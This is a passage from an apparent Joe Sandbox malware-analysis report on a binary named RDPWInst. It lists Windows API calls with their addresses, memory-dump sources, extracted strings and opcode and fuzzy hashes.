                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleService
                                                                                                                                                        • String ID: error (code $$sD$[-]
                                                                                                                                                        • API String ID: 1725840886-1845222458
                                                                                                                                                        • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                                                                        • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                                                                                                                        • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                                                                        • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                                                                        • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                                                                                                                        • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                                                                        • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                                                                                                                        APIs
                                                                                                                                                        • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                                                                                        • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                                                                                        • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                                                                                        • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CharNext
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3213498283-0
                                                                                                                                                        • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                                                                        • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                                                                                                                        • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                                                                        • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                                                                                          • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                                                                                        • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                                                                                        • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4102113445-0
                                                                                                                                                        • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                                                                        • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                                                                                                                        • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                                                                        • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                                                                                          • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                                                        • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                                                                        • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                                                                                                                        • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                                                                        • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocaleThread
                                                                                                                                                        • String ID: 0\D$`\D$|\D
                                                                                                                                                        • API String ID: 635194068-1443555069
                                                                                                                                                        • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                                                                        • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                                                                                                                        • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                                                                        • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocaleThread
                                                                                                                                                        • String ID: 0\D$`\D$|\D
                                                                                                                                                        • API String ID: 635194068-1443555069
                                                                                                                                                        • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                                                                        • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                                                                                                                        • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                                                                        • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                                                                        • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                                                        • String ID: $yyyy
                                                                                                                                                        • API String ID: 3303714858-404527807
                                                                                                                                                        • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                                                                        • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                                                                                                                        • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                                                                        • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                                                                                                                        APIs
                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                        • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                                                                                        • API String ID: 237503144-3145546840
                                                                                                                                                        • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                                                                        • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                                                                                                                        • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                                                                        • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                                                                                                                        APIs
                                                                                                                                                        • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                                                                                        • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                                                                                        • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                                                                                          • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$ErrorFindLastLoadLock
                                                                                                                                                        • String ID: CHARTABLE
                                                                                                                                                        • API String ID: 1074440638-2668339182
                                                                                                                                                        • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                                                                        • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                                                                                                                        • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                                                                        • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 920484758-0
                                                                                                                                                        • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                                                                        • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                                                                                                                        • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                                                                        • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                                                        • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3990497365-0
                                                                                                                                                        • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                                                                        • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                                                                                                                        • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                                                                        • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                                                                                          • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                                                                                          • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2255706666-0
                                                                                                                                                        • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                                                                        • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
